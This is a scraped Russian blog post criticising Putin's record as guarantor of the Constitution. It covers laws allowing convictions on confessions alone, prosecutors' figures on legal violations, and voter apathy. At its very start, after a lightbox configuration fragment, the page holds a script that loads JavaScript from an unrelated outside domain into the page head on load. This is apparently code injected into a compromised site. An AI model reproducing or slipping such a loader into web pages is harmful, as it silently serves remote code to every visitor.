, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Нужна ли россиянам правовая Россия?

20 Мар

Все понимают и осознают опасность движения на дорогах, если не соблюдаются правила дорожного движения. Расплата общества за их нарушение слишком велика — десятки тысяч ежегодно погибают и сотни тысяч становятся калеками. Всё это заставляет россиян, а также лиц, осуществляющих государственную власть, принимать меры, обеспечивающие безопасное движение.

Но жизнь россиян, по правилам, изложенным в законах России, никто не пытается обеспечивать.

Единственный источник власти в стране, многонациональный народ, выразил свою волю в Конституции России, о том, как он хотел бы жить, какие права и обязанности иметь, на какую защиту рассчитывать, какую государственность иметь…

Для обеспечения исполнения воли народа, что изложена в Основном Законе страны,  прописана такая должность — гарант Конституции. Им является всенародно избранные Президент России.

Должность есть, а вот того, кто исполнял бы обязанности гаранта Конституции, так и не нашлось за все 25 лет.

Более того, тот, кто являлся гарантом Конституции, не раз подписывал и обнародовал законы, которые Конституционный Суд РФ не раз признавал не соответствующими Конституции России.

Но  решался на это суд Конституционный не всегда.

Так, достоверно зная о пыточном https://sobchakprotivvseh.ru/blog/41  судопроизводстве, вынуждающим назначенного обвиняемым бать на себя чужую вину, Путин подписал и обнародовал закон, позволяющий  осуждать на одних только признательных показаниях обвиняемых, без проверки собранных по делу доказательств.

Тем самым сделал невостребованным важнейший раздел в УПК РФ о доказывании и доказательствах.

Как юрист по образованию Путин не мог не знать, что признание обвиняемым своей вины в совершении преступления может быть положено в основу обвинения лишь при подтверждении его виновности совокупностью имеющихся по уголовному делу доказательств (ч. 2 ст. 77 УПК РФ).

Но подписанный http://rulaws.ru/laws/Federalnyy-zakon-ot-04.07.2003-N-92-FZ/        Путиным закон, позволяет не считаться с такой процедурой доказывания. Даже Сталин с Вышинским, считавшие  признание обвиняемым вины «царицей» доказательств, не пытались узаконить это.  Путин узаконил. И, что, стало больше законности?

Генеральный прокурор Ю. Чайка утверждает, что при таком судопроизводстве количество допущенных нарушений закона растёт, сейчас составило 5,2 миллиона http://kremlin.ru/events/president/news/56863

Представляете себе ситуацию, на один миллион возбужденных уголовных дел приходится 5,2 миллиона нарушений закона. Такого нет ни в одной стране, назвавшей себя правовым государством.

Конституционный Суд остаётся только наблюдателем за таким неправомерным судопроизводством.

Прошедшие выборы показали, что более 70 млн., имеющим право голоса, россиянам, правовая Россия не нужна.

В своём Послании Путин обошёл стороной тот факт, что только 6% пострадавших от преступлений, получают защиту от правоохранительной системы. Остальных лишают этого, неправомерно отказывая в возбуждении уголовных дел.

Путин не дал ответа на факты неправомерного разорения сотен тысяч предпринимателей, путём неправомерного возбуждения уголовных дел.

Не пояснил  Путин народу,  почему п.п. 8. п. 2 ст. 235 ГК РФ за шесть лет был применен не более 40 раз к вороватым чиновникам?

На заседании коллегии Генпрокуратуры России http://kremlin.ru/events/president/news/56863   генпрокурор Юрия Чайка отметил: «На фоне сокращения числа направленных в суд дел количество допущенных нарушений закона выросло и составило 5,2 миллиона.  И это при том, что почти 70 процентов уголовных дел рассматривают в судах в особом порядке, без исследования доказательств, а следователи и дознаватели по указанным делам, как известно, упрощают свою работу до предела.

При таких минимальных нагрузках и затраченных интеллектуальных ресурсах мы вправе требовать принципиально иного уровня законности».

Но участвовавший на заседании коллегии Путин,  не предпринял никаких мер  по противодействию сложившейся неправомерной правоприменительной практики, которая лишает судебную власть состязательного процесса, исследующего собранные по делу доказательства.

Странно осознавать, что юрист Путин так и не понял важности для управления страной правосудия, как вида государственной деятельности, осуществляемой в особом порядке, установленном Конституцией и процессуальным законодательством.

Беда еще и в том, что в его кадровом резерве нет настоящих правоведов, способных убедить в важности власти Конституции России, обеспеченной её гарантом и правосудием.

Ситуацию не спасает и 34 млн. россиян, что проигнорировали выборы. Среди них нет не только правоведов, но и желающих жить по правилам, изложенным в Конституции России. Удручающая жизнь, при ничем не умеряемом самовластии, нам шесть лет обеспечена.

Опять  различные общественные организации будут имитировать защиту прав и свобод, призывать маршировать в защиту кого-то…

Пустое это всё, господа хорошие. Нужна власть Конституции, обеспеченная её гарантом и правосудием. А пока имеем второе десятилетие только декларированную и не обеспеченную  гарантом  и правосудием, Конституцию. Это опять жизнь по лжи.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.